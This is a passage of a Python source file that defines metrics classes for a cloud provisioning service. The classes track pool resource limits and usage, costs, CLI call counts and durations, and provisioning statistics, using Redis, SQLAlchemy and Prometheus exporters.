updated_timestamp: Optional[float] = None
"""
Time when these metrics were updated, as UNIX timestamp.
"""
def __init__(self, poolname: str, dimension: PoolResourcesMetricsDimensions) -> None:
"""
Resource metrics of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
:param dimension: whether this instance describes limits or usage.
"""
super(PoolResources, self).__init__()
self._key = PoolResources._KEY.format(poolname=poolname, dimension=dimension.value)
self._key_updated_timestamp = PoolResources._KEY_UPDATED_TIMESTAMP.format(
poolname=poolname, dimension=dimension.value
)
self.instances = None
self.cores = None
self.memory = None
self.diskspace = None
self.snapshots = None
self.networks = {}
self.updated_timestamp = None
self.__post_init__()
@with_context
def sync(self, cache: redis.Redis) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param cache: cache instance to use for cache access.
"""
super(PoolResources, self).sync()
r_serialized = safe_call(cast(Callable[[str], Optional[str]], cache.get), self._key)
# TODO: needs fix when we start catching errors in metric handling
if r_serialized.is_error:
return
serialized = json.loads(r_serialized.unwrap() or '{}')
# Since we decided to store in the simplest possible manner, loading is where we "pay the price".
#
# We have the serialized JSON blob representing the original `PoolResources` instance, with its fields
# now being keys and so on. We can replace values in this class by using this serialized blob and storing
# it in our `__dict__`, except for `networks`. In the serialized form, `networks` is a mapping of network
# names to plain mappings, and we need to restore it as a mapping of dataclasses. Therefore, `networks`
# needs a bit more work, constructing a dataclass from each serialized mapping.
self.__dict__.update(serialized)
self.networks = {
network_name: PoolNetworkResources(**serialized_network)
for network_name, serialized_network in serialized.get('networks', {}).items()
}
updated = cast(
Callable[[str], Optional[bytes]],
cache.get
)(self._key_updated_timestamp)
self.updated_timestamp = updated if updated is None else float(updated)
@with_context
def store(self, cache: redis.Redis) -> None:
"""
Store currently carried values in the storage.
:param cache: cache instance to use for cache access.
"""
# Storing the data can be actually quite simple: since we're using dataclasses, we can serialize the whole
# container as a JSON blob. There's no need to store each field as a separate key.
#
# This method takes care of serializing the `networks` mapping as well, since `asdict` can deal with
# nested dataclasses.
safe_call(
cast(Callable[[str, str], None], cache.set),
self._key,
json.dumps(dataclasses.asdict(self))
)
safe_call(
cast(Callable[[str, float], None], cache.set),
self._key_updated_timestamp,
datetime.datetime.timestamp(datetime.datetime.utcnow())
)
class PoolResourcesUsage(PoolResources):
"""
Describes current usage of pool resources.
"""
def __init__(self, poolname: str) -> None:
"""
Resource usage of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
super(PoolResourcesUsage, self).__init__(poolname, PoolResourcesMetricsDimensions.USAGE)
class PoolResourcesLimits(PoolResources):
"""
Describes current limits of pool resources.
"""
def __init__(self, poolname: str) -> None:
"""
Resource limits of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
super(PoolResourcesLimits, self).__init__(poolname, PoolResourcesMetricsDimensions.LIMITS)
@dataclasses.dataclass
class PoolResourcesDepleted:
"""
Describes whether and which pool resources have been depleted.
"""
available_network_count: int = 0
instances: bool = False
cores: bool = False
memory: bool = False
diskspace: bool = False
snapshots: bool = False
# Depleted networks are listed as names only, no deeper structure. We could change this to a mapping
# between network names and, for example, a boolean or a structure describing which network resource is
# depleted, but at this moment, all we need to know is whether or not the network is depleted, nothing more.
networks: List[str] = dataclasses.field(default_factory=list)
def is_depleted(self) -> bool:
"""
Test whether any of resources is marked as depleted.
:returns: ``True`` when any of the fields is marked as depleted, or if there are available networks
but all of them are marked as depleted; ``False`` otherwise.
"""
return any([getattr(self, field) for field in PoolResources._TRIVIAL_FIELDS]) \
or (self.available_network_count != 0 and len(self.networks) == self.available_network_count)
def depleted_resources(self) -> List[str]:
"""
Collect depleted resources.
:returns: list of names of depleted resources. Trivial resources (CPU cores, RAM, etc.) are represented
by their names, networks are represented as network name prefixed with ``network.``, e.g. ``network.foo``.
"""
return [
fieldname
for fieldname in PoolResources._TRIVIAL_FIELDS
if getattr(self, fieldname) is True
] + [
'network.{}'.format(network_name)
for network_name in self.networks
]
@dataclasses.dataclass
class PoolResourcesMetrics(MetricsBase):
"""
Describes resources of a pool, both limits and usage.
"""
limits: PoolResourcesLimits
usage: PoolResourcesUsage
def __init__(self, poolname: str) -> None:
"""
Resource metrics of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
self.limits = PoolResourcesLimits(poolname)
self.usage = PoolResourcesUsage(poolname)
self.__post_init__()
def get_depletion(
self,
is_enough: Callable[[str, int, int], bool]
) -> PoolResourcesDepleted:
"""
Compare limits and usage and yield :py:class:`PoolResourcesDepleted` instance describing depleted resources.
:param is_enough: a callback called for every resource, with resource name,
its limit and usage as arguments. Returns ``True`` when there is enough
resources, ``False`` otherwise.
:returns: :py:class:`PoolResourcesDepleted` instance listing which resources are depleted.
"""
delta = PoolResourcesDepleted()
for fieldname in PoolResources._TRIVIAL_FIELDS:
limit, usage = getattr(self.limits, fieldname), getattr(self.usage, fieldname)
# Skip undefined values: if left undefined, pool does not care about this dimension.
if not limit or not usage:
continue
setattr(delta, fieldname, not is_enough(fieldname, limit, usage))
delta.available_network_count = len(self.limits.networks)
for network_name, network_limit in self.limits.networks.items():
network_usage = self.usage.networks.get(network_name)
# Networks that don't report any usage are treated as having enough resources - again, the pool does
# not care about this network enough to provide data.
if network_usage is None:
continue
if network_limit.addresses is None or network_usage.addresses is None:
continue
if is_enough(f'network.addresses.{network_name}', network_limit.addresses, network_usage.addresses):
continue
delta.networks.append(network_name)
return delta
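# Usage sketch (illustrative; 'example-pool' is a hypothetical pool name): a simple
# "is there headroom?" policy that treats a resource as depleted once usage reaches
# its limit:
#
#     metrics = PoolResourcesMetrics('example-pool')
#     metrics.sync()
#     depleted = metrics.get_depletion(lambda name, limit, usage: usage < limit)
#     if depleted.is_depleted():
#         print(depleted.depleted_resources())  # e.g. ['cores', 'network.foo']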
ResourceCostType = int
class ResourceType(enum.Enum):
"""
Resource type used in cost tracking.
"""
VIRTUAL_MACHINE = 'virtual-machine'
DISK = 'disk'
STATIC_IP = 'static-ip'
NETWORK_INTERFACE = 'network-interface'
VIRTUAL_NETWORK = 'virtual-network'
@dataclasses.dataclass
class PoolCostsMetrics(MetricsBase):
"""
Cumulative cost produced by a pool.
"""
virtual_machine: Optional[ResourceCostType]
disk: Optional[ResourceCostType]
static_ip: Optional[ResourceCostType]
network_interface: Optional[ResourceCostType]
virtual_network: Optional[ResourceCostType]
def __init__(self, poolname: str) -> None:
"""
Cost metrics of a particular pool.
:param poolname: name of the pool whose costs we are tracking.
"""
self._key = 'metrics.pool.{poolname}.cost.cumulative_cost'.format(poolname=poolname)
self.virtual_machine = None
self.disk = None
self.static_ip = None
self.network_interface = None
self.virtual_network = None
@with_context
def sync(self, cache: redis.Redis, logger: gluetool.log.ContextAdapter) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param cache: cache instance to use for cache access.
:param logger: logger to use for logging.
"""
for field, count in get_metric_fields(logger, cache, self._key).items():
setattr(self, field.replace('-', '_'), count)
@with_context
def inc_costs(
self,
resource_type: ResourceType,
value: ResourceCostType,
cache: redis.Redis,
logger: gluetool.log.ContextAdapter
) -> None:
"""
Increment cost.
:param cache: cache instance to use for cache access.
:param logger: logger to use for logging.
:param value: value (in cents) to increase the cumulative_cost.
:param resource_type: resource type whose value is being incremented.
"""
inc_metric_field(logger, cache, self._key, resource_type.value, value)
@dataclasses.dataclass
class PoolMetrics(MetricsBase):
"""
Metrics of a particular pool.
"""
_KEY_ERRORS = 'metrics.pool.{poolname}.errors'
_KEY_CLI_CALLS = 'metrics.pool.{poolname}.cli-calls'
_KEY_CLI_EXIT_CODES = 'metrics.pool.{poolname}.cli-calls.exit-codes'
_KEY_CLI_CALLS_DURATIONS = 'metrics.pool.{poolname}.cli-calls.durations'
# Image & flavor refresh process does not have their own metrics, hence using this container to track the "last
# update" timestamp.
_KEY_INFO_UPDATED_TIMESTAMP = 'metrics.pool.{poolname}.{info}.updated_timestamp'
poolname: str
enabled: bool
routing_enabled: bool
resources: PoolResourcesMetrics
costs: PoolCostsMetrics
current_guest_request_count: int
current_guest_request_count_per_state: Dict[GuestState, int]
errors: Dict[str, int]
image_info_updated_timestamp: Optional[float]
flavor_info_updated_timestamp: Optional[float]
# commandname => count
cli_calls: Dict[str, int]
# commandname:exitcode => count
cli_calls_exit_codes: Dict[Tuple[str, str], int]
# bucket:commandname => count
cli_calls_durations: Dict[Tuple[str, str], int]
def __init__(self, poolname: str) -> None:
"""
Metrics of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
self.key_errors = self._KEY_ERRORS.format(poolname=poolname)
self.key_image_info_refresh_timestamp = self._KEY_INFO_UPDATED_TIMESTAMP.format(
poolname=poolname,
info='image'
)
self.key_flavor_info_refresh_timestamp = self._KEY_INFO_UPDATED_TIMESTAMP.format(
poolname=poolname,
info='flavor'
)
self.key_cli_calls = self._KEY_CLI_CALLS.format(poolname=poolname)
self.key_cli_calls_exit_codes = self._KEY_CLI_EXIT_CODES.format(poolname=poolname)
self.key_cli_calls_durations = self._KEY_CLI_CALLS_DURATIONS.format(poolname=poolname)
self.poolname = poolname
self.enabled = False
self.routing_enabled = True
self.resources = PoolResourcesMetrics(poolname)
self.costs = PoolCostsMetrics(poolname)
self.current_guest_request_count = 0
self.current_guest_request_count_per_state = {}
self.errors = {}
self.image_info_updated_timestamp = None
self.flavor_info_updated_timestamp = None
self.cli_calls = {}
self.cli_calls_exit_codes = {}
self.cli_calls_durations = {}
self.__post_init__()
@staticmethod
@with_context
def _refresh_info_updated_timestamp(
pool: str,
info: str,
cache: redis.Redis
) -> Result[None, Failure]:
safe_call(
cast(Callable[[str, float], None], cache.set),
PoolMetrics._KEY_INFO_UPDATED_TIMESTAMP.format(poolname=pool, info=info),
datetime.datetime.timestamp(datetime.datetime.utcnow())
)
return Ok(None)
@staticmethod
def refresh_image_info_updated_timestamp(
pool: str
) -> Result[None, Failure]:
"""
Update "latest updated" timestamp of pool image info cache to current time.
:param pool: pool whose cache has been updated.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
return PoolMetrics._refresh_info_updated_timestamp(pool, 'image')
@staticmethod
def refresh_flavor_info_updated_timestamp(
pool: str
) -> Result[None, Failure]:
"""
Update "latest updated" timestamp of pool flavor info cache to current time.
:param pool: pool whose cache has been updated.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
return PoolMetrics._refresh_info_updated_timestamp(pool, 'flavor')
@staticmethod
@with_context
def inc_error(
pool: str,
error: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase counter for a given pool error by 1.
:param pool: pool that provided the instance.
:param error: error to track.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, PoolMetrics._KEY_ERRORS.format(poolname=pool), error)
return Ok(None)
@staticmethod
@with_context
def inc_cli_call(
poolname: str,
commandname: str,
exit_code: int,
duration: float,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase counter for a given CLI command by 1.
:param poolname: pool that executed the command.
:param commandname: command "ID" - something to tell commands and group of commands apart.
:param exit_code: exit code of the command.
:param duration: duration of the command session, in seconds.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
# raw count
inc_metric_field(
logger,
cache,
PoolMetrics._KEY_CLI_CALLS.format(poolname=poolname),
commandname
)
# exit code
inc_metric_field(
logger,
cache,
PoolMetrics._KEY_CLI_EXIT_CODES.format(poolname=poolname),
f'{commandname}:{exit_code}'
)
# duration: pick the smallest bucket whose upper bound covers the duration (Prometheus `le` semantics)
bucket = min([threshold for threshold in CLI_CALL_DURATION_BUCKETS if threshold >= duration])
inc_metric_field(
logger,
cache,
PoolMetrics._KEY_CLI_CALLS_DURATIONS.format(poolname=poolname), '{}:{}'.format(bucket, commandname))
return Ok(None)
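# Example: a 42-second call lands in the 50 s bucket - the smallest threshold in
# CLI_CALL_DURATION_BUCKETS that covers the duration - so the stored hash field
# becomes "50:<commandname>" and its counter is incremented by 1.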
@with_context
def sync(
self,
logger: gluetool.log.ContextAdapter,
session: sqlalchemy.orm.session.Session,
cache: redis.Redis
) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param cache: cache instance to use for cache access.
"""
super(PoolMetrics, self).sync()
r_enabled = KNOB_POOL_ENABLED.get_value(session=session, poolname=self.poolname)
if r_enabled.is_error:
r_enabled.unwrap_error().handle(logger)
return
self.enabled = r_enabled.unwrap() or False # True => True, False => False, None => False
# avoid circular imports
from .routing_policies import KNOB_ROUTE_POOL_ENABLED
r_routing_enabled = KNOB_ROUTE_POOL_ENABLED.get_value(session=session, poolname=self.poolname)
# TODO: sync should return Result
if r_routing_enabled.is_error:
r_routing_enabled.unwrap_error().handle(logger)
return
self.routing_enabled = r_routing_enabled.unwrap()
self.current_guest_request_count = cast(
Tuple[int],
session.query(sqlalchemy.func.count(artemis_db.GuestRequest.guestname)) # type: ignore[no-untyped-call]
.filter(artemis_db.GuestRequest.poolname == self.poolname)
.one()
)[0]
self.current_guest_request_count_per_state = {
state: 0
for state in GuestState.__members__.values()
}
self.current_guest_request_count_per_state.update({
GuestState(record[0]): record[1]
for record in cast(
List[Tuple[str, int]],
session.query( # type: ignore[no-untyped-call]
artemis_db.GuestRequest.state,
sqlalchemy.func.count(artemis_db.GuestRequest.state)
)
.filter(artemis_db.GuestRequest.poolname == self.poolname)
.group_by(artemis_db.GuestRequest.state)
.all()
)
})
self.errors = {
errorname: count
for errorname, count in get_metric_fields(logger, cache, self.key_errors).items()
}
updated = cast(
Callable[[str], Optional[bytes]],
cache.get
)(self.key_image_info_refresh_timestamp)
self.image_info_updated_timestamp = updated if updated is None else float(updated)
updated = cast(
Callable[[str], Optional[bytes]],
cache.get
)(self.key_flavor_info_refresh_timestamp)
self.flavor_info_updated_timestamp = updated if updated is None else float(updated)
# commandname => count
self.cli_calls = {
field: count
for field, count in get_metric_fields(
logger,
cache,
self._KEY_CLI_CALLS.format(poolname=self.poolname)
).items()
}
# commandname:exit-code => count
self.cli_calls_exit_codes = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(
logger,
cache,
self.key_cli_calls_exit_codes
).items()
}
# bucket:commandname => count
self.cli_calls_durations = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(
logger,
cache,
self._KEY_CLI_CALLS_DURATIONS.format(poolname=self.poolname)).items()
}
@dataclasses.dataclass
class UndefinedPoolMetrics(MetricsBase):
"""
Metrics of an "undefined" pool, to handle values for guests that don't belong into any pool (yet).
"""
poolname: str
enabled: bool
routing_enabled: bool
resources: PoolResourcesMetrics
costs: PoolCostsMetrics
current_guest_request_count: int
current_guest_request_count_per_state: Dict[GuestState, int]
errors: Dict[str, int]
image_info_updated_timestamp: Optional[float]
flavor_info_updated_timestamp: Optional[float]
cli_calls: Dict[str, int]
cli_calls_exit_codes: Dict[Tuple[str, str], int]
cli_calls_durations: Dict[Tuple[str, str], int]
def __init__(self, poolname: str) -> None:
"""
Metrics of a particular pool.
:param poolname: name of the pool whose metrics we're tracking.
"""
self.poolname = poolname
self.enabled = False
self.routing_enabled = True
self.resources = PoolResourcesMetrics(poolname)
self.costs = PoolCostsMetrics(poolname)
self.current_guest_request_count = 0
self.current_guest_request_count_per_state = {}
self.errors = {}
self.image_info_updated_timestamp = None
self.flavor_info_updated_timestamp = None
self.cli_calls = {}
self.cli_calls_exit_codes = {}
self.cli_calls_durations = {}
self.__post_init__()
@with_context
def sync(self, logger: gluetool.log.ContextAdapter, session: sqlalchemy.orm.session.Session) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
"""
super(UndefinedPoolMetrics, self).sync()
# NOTE: sqlalchemy overloads operators to construct the conditions, and `is` is not overloaded. Therefore
# in the query, we have to use `==` instead of more Pythonic `is`.
self.current_guest_request_count = cast(
Tuple[int],
session.query(sqlalchemy.func.count(artemis_db.GuestRequest.guestname)) # type: ignore[no-untyped-call]
.filter(artemis_db.GuestRequest.poolname == None) # noqa: E711
.one()
)[0]
self.current_guest_request_count_per_state = {
state: 0
for state in GuestState.__members__.values()
}
self.current_guest_request_count_per_state.update({
GuestState(record[0]): record[1]
for record in cast(
List[Tuple[str, int]],
session.query( # type: ignore[no-untyped-call]
artemis_db.GuestRequest.state,
sqlalchemy.func.count(artemis_db.GuestRequest.state)
)
.filter(artemis_db.GuestRequest.poolname == None) # noqa: E711
.group_by(artemis_db.GuestRequest.state)
.all()
)
})
@dataclasses.dataclass
class PoolsMetrics(MetricsBase):
"""
General metrics shared by pools, and per-pool metrics.
"""
# here is the space left for global pool-related metrics.
pools: Dict[str, Union[PoolMetrics, UndefinedPoolMetrics]] = dataclasses.field(default_factory=dict)
@with_context
def sync(self, logger: gluetool.log.ContextAdapter, session: sqlalchemy.orm.session.Session) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
"""
super(PoolsMetrics, self).sync()
# Avoid circular imports
from .tasks import get_pools
r_pools = get_pools(logger, session, enabled_only=False)
if r_pools.is_error:
r_pools.unwrap_error().handle(logger)
self.pools = {}
else:
self.pools = {
pool.poolname: PoolMetrics(pool.poolname)
for pool in r_pools.unwrap()
}
self.pools['undefined'] = UndefinedPoolMetrics('undefined')
for metrics in self.pools.values():
metrics.sync()
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(PoolsMetrics, self).register_with_prometheus(registry)
def _create_pool_resource_metric(name: str, unit: Optional[str] = None) -> Gauge:
return Gauge(
'pool_resources_{}{}'.format(name, '_{}'.format(unit) if unit else ''),
'Limits and usage of pool {}'.format(name),
['pool', 'dimension'],
registry=registry
)
def _create_network_resource_metric(name: str, unit: Optional[str] = None) -> Gauge:
return Gauge(
'pool_resources_network_{}{}'.format(name, '_{}'.format(unit) if unit else ''),
'Limits and usage of pool network {}'.format(name),
['pool', 'network', 'dimension'],
registry=registry
)
self.POOL_ENABLED = Gauge(
'pool_enabled',
'Current enabled/disabled pool state by pool.',
['pool'],
registry=registry
)
self.POOL_ROUTING_ENABLED = Gauge(
'pool_routing_enabled',
'Current enabled/disabled pool routing state by pool.',
['pool'],
registry=registry
)
self.CURRENT_GUEST_REQUEST_COUNT = Gauge(
'current_guest_request_count',
'Current number of guest requests being provisioned by pool and state.',
['pool', 'state'],
registry=registry
)
self.POOL_ERRORS = Counter(
'pool_errors',
'Overall total number of pool errors, per pool and error.',
['pool', 'error'],
registry=registry
)
self.POOL_COSTS = Counter(
'pool_costs',
'Overall total cost of resources used by a pool, per pool and resource type.',
['pool', 'resource'],
registry=registry
)
self.POOL_RESOURCES_INSTANCES = _create_pool_resource_metric('instances')
self.POOL_RESOURCES_CORES = _create_pool_resource_metric('cores')
self.POOL_RESOURCES_MEMORY = _create_pool_resource_metric('memory', unit='bytes')
self.POOL_RESOURCES_DISKSPACE = _create_pool_resource_metric('diskspace', unit='bytes')
self.POOL_RESOURCES_SNAPSHOTS = _create_pool_resource_metric('snapshot')
self.POOL_RESOURCES_NETWORK_ADDRESSES = _create_network_resource_metric('addresses')
self.POOL_RESOURCES_UPDATED_TIMESTAMP = _create_pool_resource_metric('updated_timestamp')
self.POOL_IMAGE_INFO_UPDATED_TIMESTAMP = Gauge(
'pool_image_info_updated_timestamp',
'Last time pool image info has been updated.',
['pool'],
registry=registry
)
self.POOL_FLAVOR_INFO_UPDATED_TIMESTAMP = Gauge(
'pool_flavor_info_updated_timestamp',
'Last time pool flavor info has been updated.',
['pool'],
registry=registry
)
self.CLI_CALLS = Counter(
'cli_calls',
'Overall total number of CLI commands executed, per pool and command name.',
['pool', 'command'],
registry=registry
)
self.CLI_CALLS_EXIT_CODES = Counter(
'cli_calls_exit_codes',
'Overall total number of CLI commands exit codes, per pool, command name and exit code.',
['pool', 'command', 'exit_code'],
registry=registry
)
self.CLI_CALLS_DURATIONS = Histogram(
'cli_call_duration_seconds',
'The time spent executing CLI commands, by pool and command name.',
['pool', 'command'],
buckets=CLI_CALL_DURATION_BUCKETS,
registry=registry
)
def update_prometheus(self) -> None:
"""
Update values of Prometheus metric instances with the data in this container.
"""
super(PoolsMetrics, self).update_prometheus()
reset_counters(self.POOL_ERRORS)
reset_counters(self.POOL_COSTS)
reset_counters(self.CLI_CALLS)
reset_counters(self.CLI_CALLS_EXIT_CODES)
reset_histogram(self.CLI_CALLS_DURATIONS)
for poolname, pool_metrics in self.pools.items():
self.POOL_ENABLED.labels(pool=poolname).set(1 if pool_metrics.enabled else 0)
self.POOL_ROUTING_ENABLED.labels(pool=poolname).set(1 if pool_metrics.routing_enabled else 0)
for state in pool_metrics.current_guest_request_count_per_state:
self.CURRENT_GUEST_REQUEST_COUNT \
.labels(poolname, state.value) \
.set(pool_metrics.current_guest_request_count_per_state[state])
for error, count in pool_metrics.errors.items():
self.POOL_ERRORS.labels(pool=poolname, error=error)._value.set(count)
for resource in ResourceType.__members__.values():
value = getattr(pool_metrics.costs, resource.value.replace('-', '_'))
self.POOL_COSTS \
.labels(pool=poolname, resource=resource.value) \
._value.set(value if value is not None else float('NaN'))
for gauge, metric_name in [
(self.POOL_RESOURCES_INSTANCES, 'instances'),
(self.POOL_RESOURCES_CORES, 'cores'),
(self.POOL_RESOURCES_MEMORY, 'memory'),
(self.POOL_RESOURCES_DISKSPACE, 'diskspace'),
(self.POOL_RESOURCES_SNAPSHOTS, 'snapshots')
]:
limit = getattr(pool_metrics.resources.limits, metric_name)
usage = getattr(pool_metrics.resources.usage, metric_name)
gauge \
.labels(pool=poolname, dimension='limit') \
.set(limit if limit is not None else float('NaN'))
gauge \
.labels(pool=poolname, dimension='usage') \
.set(usage if usage is not None else float('NaN'))
for network_name, network_metrics in pool_metrics.resources.limits.networks.items():
self.POOL_RESOURCES_NETWORK_ADDRESSES \
.labels(pool=poolname, dimension='limit', network=network_name) \
.set(network_metrics.addresses if network_metrics.addresses is not None else float('NaN'))
for network_name, network_metrics in pool_metrics.resources.usage.networks.items():
self.POOL_RESOURCES_NETWORK_ADDRESSES \
.labels(pool=poolname, dimension='usage', network=network_name) \
.set(network_metrics.addresses if network_metrics.addresses is not None else float('NaN'))
self.POOL_RESOURCES_UPDATED_TIMESTAMP \
.labels(pool=poolname, dimension='limit') \
.set(pool_metrics.resources.limits.updated_timestamp or float('NaN'))
self.POOL_RESOURCES_UPDATED_TIMESTAMP \
.labels(pool=poolname, dimension='usage') \
.set(pool_metrics.resources.usage.updated_timestamp or float('NaN'))
self.POOL_IMAGE_INFO_UPDATED_TIMESTAMP \
.labels(pool=poolname) \
.set(pool_metrics.image_info_updated_timestamp or float('NaN'))
self.POOL_FLAVOR_INFO_UPDATED_TIMESTAMP \
.labels(pool=poolname) \
.set(pool_metrics.flavor_info_updated_timestamp or float('NaN'))
for commandname, count in pool_metrics.cli_calls.items():
self.CLI_CALLS \
.labels(pool=poolname, command=commandname) \
._value.set(count)
for (commandname, exit_code), count in pool_metrics.cli_calls_exit_codes.items():
self.CLI_CALLS_EXIT_CODES \
.labels(pool=poolname, command=commandname, exit_code=exit_code) \
._value.set(count)
for (bucket_threshold, commandname), count in pool_metrics.cli_calls_durations.items():
bucket_index = CLI_CALL_DURATION_BUCKETS.index(
prometheus_client.utils.INF if bucket_threshold == 'inf' else int(bucket_threshold)
)
self.CLI_CALLS_DURATIONS \
.labels(pool=poolname, command=commandname) \
._buckets[bucket_index] \
.set(count)
self.CLI_CALLS_DURATIONS \
.labels(pool=poolname, command=commandname) \
._sum \
.inc(float(bucket_threshold) * count)
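# A hedged sketch of the histogram reconstruction used above: exact durations are
# not tracked, only the bucket each observation fell into, so the sum is
# approximated as (count * bucket threshold) per bucket (thresholds below are
# hypothetical, not the real CLI_CALL_DURATION_BUCKETS):
#
#     observed = {1: 3, 5: 2}  # bucket threshold => number of observations
#     approx_sum = sum(threshold * count for threshold, count in observed.items())
#     # approx_sum == 13, an upper-bound estimate of the true sum of durations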
@dataclasses.dataclass
class ProvisioningMetrics(MetricsBase):
"""
Provisioning metrics.
"""
_KEY_PROVISIONING_REQUESTED = 'metrics.provisioning.requested'
_KEY_PROVISIONING_SUCCESS = 'metrics.provisioning.success'
_KEY_FAILOVER = 'metrics.provisioning.failover'
_KEY_FAILOVER_SUCCESS = 'metrics.provisioning.failover.success'
_KEY_PROVISIONING_DURATIONS = 'metrics.provisioning.durations'
requested: int = 0
current: int = 0
success: Dict[str, int] = dataclasses.field(default_factory=dict)
failover: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
failover_success: Dict[Tuple[str, str], int] = dataclasses.field(default_factory=dict)
# We want to maybe point fingers on pools where guests are stuck, so include pool name and state as labels.
guest_ages: List[Tuple[GuestState, Optional[str], datetime.timedelta]] = dataclasses.field(default_factory=list)
provisioning_durations: Dict[str, int] = dataclasses.field(default_factory=dict)
@staticmethod
@with_context
def inc_requested(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase :py:attr:`requested` metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric(logger, cache, ProvisioningMetrics._KEY_PROVISIONING_REQUESTED)
return Ok(None)
@staticmethod
@with_context
def inc_success(
pool: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase :py:attr:`success` metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param pool: pool that provided the instance.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, ProvisioningMetrics._KEY_PROVISIONING_SUCCESS, pool)
return Ok(None)
@staticmethod
@with_context
def inc_failover(
from_pool: str,
to_pool: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase pool failover metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param from_pool: name of the originating pool.
:param to_pool: name of the replacement pool.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, ProvisioningMetrics._KEY_FAILOVER, '{}:{}'.format(from_pool, to_pool))
return Ok(None)
@staticmethod
@with_context
def inc_failover_success(
from_pool: str,
to_pool: str,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increase successful pool failover metric by 1.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param from_pool: name of the originating pool.
:param to_pool: name of the replacement pool.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
inc_metric_field(logger, cache, ProvisioningMetrics._KEY_FAILOVER_SUCCESS, '{}:{}'.format(from_pool, to_pool))
return Ok(None)
@staticmethod
@with_context
def inc_provisioning_durations(
duration: int,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis
) -> Result[None, Failure]:
"""
Increment provisioning duration bucket by one.
The bucket is determined by the upper bound of the given ``duration``.
:param logger: logger to use for logging.
:param duration: how long, in milliseconds, the provisioning took.
:param cache: cache instance to use for cache access.
:returns: ``None`` on success, :py:class:`Failure` instance otherwise.
"""
bucket = min([threshold for threshold in PROVISION_DURATION_BUCKETS if threshold > duration])
inc_metric_field(logger, cache, ProvisioningMetrics._KEY_PROVISIONING_DURATIONS, '{}'.format(bucket))
return Ok(None)
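# A small illustration of the bucket selection above, with hypothetical
# thresholds; the last threshold is always infinity, so the list passed
# to `min()` is never empty:
#
#     >>> buckets = [60, 300, 600, float('inf')]
#     >>> min(threshold for threshold in buckets if threshold > 450)
#     600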
@with_context
def sync(
self,
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
session: sqlalchemy.orm.session.Session
) -> None:
"""
Load values from the storage and update this container with up-to-date values.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param cache: cache instance to use for cache access.
"""
super(ProvisioningMetrics, self).sync()
NOW = datetime.datetime.utcnow()
current_record = session.query( # type: ignore[no-untyped-call]
sqlalchemy.func.count(artemis_db.GuestRequest.guestname)
)
self.current = current_record.scalar()
self.requested = get_metric(logger, cache, self._KEY_PROVISIONING_REQUESTED) or 0
self.success = {
poolname: count
for poolname, count in get_metric_fields(logger, cache, self._KEY_PROVISIONING_SUCCESS).items()
}
# fields are in form `from_pool:to_pool`
self.failover = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_FAILOVER).items()
}
# fields are in form `from_pool:to_pool`
self.failover_success = {
cast(Tuple[str, str], tuple(field.split(':', 1))): count
for field, count in get_metric_fields(logger, cache, self._KEY_FAILOVER_SUCCESS).items()
}
# Using `query` directly because we need just a limited set of fields, and our `Query`
# and `SafeQuery` do not support this functionality yet (it should be just a matter of correct types).
self.guest_ages = [
(record[0], record[1], NOW - record[2])
for record in cast(
List[Tuple[GuestState, Optional[str], datetime.datetime]],
session.query( # type: ignore[no-untyped-call]
artemis_db.GuestRequest.state,
artemis_db.GuestRequest.poolname,
artemis_db.GuestRequest.ctime
).all()
)
]
self.provisioning_durations = {
field: count
for field, count in get_metric_fields(logger, cache, self._KEY_PROVISIONING_DURATIONS).items()
}
def register_with_prometheus(self, registry: CollectorRegistry) -> None:
"""
Register instances of Prometheus metrics with the given registry.
:param registry: Prometheus registry to attach metrics to.
"""
super(ProvisioningMetrics, self).register_with_prometheus(registry)
self.CURRENT_GUEST_REQUEST_COUNT_TOTAL = Gauge(
'current_guest_request_count_total',
